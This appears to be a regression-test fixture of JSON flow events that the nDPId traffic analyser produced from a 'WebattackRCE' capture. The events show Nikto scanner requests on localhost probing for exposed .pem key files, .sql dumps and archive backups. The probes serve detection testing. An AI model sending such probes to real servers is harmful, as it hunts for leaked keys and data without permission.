00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276910,"pkt":"AAAAAAAAAAAAAAAACABFAADDPvVAAEAG\/T1\/AAABfwAAAcK+H5Bg7Aa5zb6cN4AYAED+twAAAQEICp1m+9adZvvWR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276912,"pkt":"AAAAAAAAAAAAAAAACABFAADDm5RAAEAGoJ5\/AAABfwAAAcLAH5Ba3KPftqtSlIAYAED+twAAAQEICp1m+9edZvvXR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276913,"pkt":"AAAAAAAAAAAAAAAACABFAADCN0tAAEAGBOl\/AAABfwAAAcLCH5DYOQ8GBjLTAIAYAED+tgAAAQEICp1m+9mdZvvZR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276916,"pkt":"AAAAAAAAAAAAAAAACABFAADCczVAAEAGyP5\/AAABfwAAAcLEH5BP20t\/\/3FheoAYAED+tgAAAQEICp1m+9ydZvvcR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276917,"pkt":"AAAAAAAAAAAAAAAACABFAADDZ9VAAEAG1F1\/AAABfwAAAcLGH5AZz1+f4E8iK4AYAED+twAAAQEICp1m+92dZvvdR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276919,"pkt":"AAAAAAAAAAAAAAAACABFAADDxTFAAEAGdwF\/AAABfwAAAcLIH5D+g\/1jHP616oAYAED+twAAAQEICp1m+9+dZvveR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276920,"pkt":"AAAAAAAAAAAAAAAACABFAADFpeFAAEAGlk9\/AAABfwAAAcLKH5AnGp2SsuR1gYAYAED+uQAAAQEICp1m++CdZvvgR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276922,"pkt":"AAAAAAAAAAAAAAAACABFAADFIE9AAEAGG+J\/AAABfwAAAcLMH5CC7hgEsmCzLIAYAED+uQAAAQEICp1m++KdZvviR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276924,"pkt":"AAAAAAAAAAAAAAAACABFAADFRxNAAEAG9R1\/AAABfwAAAcLOH5BdCH9f1fkuqIAYAED+uQAAAQEICp1m++SdZvvjR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276925,"pkt":"AAAAAAAAAAAAAAAACABFAADFQzdAAEAG+Pl\/AAABfwAAAcLQH5BEXHt7s07ta4AYAED+uQAAAQEICp1m++WdZvvlR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276926,"pkt":"AAAAAAAAAAAAAAAACABFAADIWd1AAEAG4lB\/AAABfwAAAcLSH5AL0mGV2bYy0oAYAED+vAAAAQEICp1m++adZvvmR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
